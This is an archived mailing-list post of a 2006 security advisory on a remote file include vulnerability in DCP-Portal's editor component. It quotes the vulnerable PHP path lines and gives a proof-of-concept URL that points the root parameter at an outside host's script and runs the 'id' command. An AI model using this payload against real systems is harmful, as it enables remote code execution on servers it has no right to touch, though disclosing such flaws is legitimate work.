|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML]
botan
linuxmail.org
Date: Tue Jun 13 2006 - 03:30:35 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz
$url_path_editor = "$root_url/library/editor/";
$abs_path_editor = "$root/library/editor/";
?>
Proof Of Concept
http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]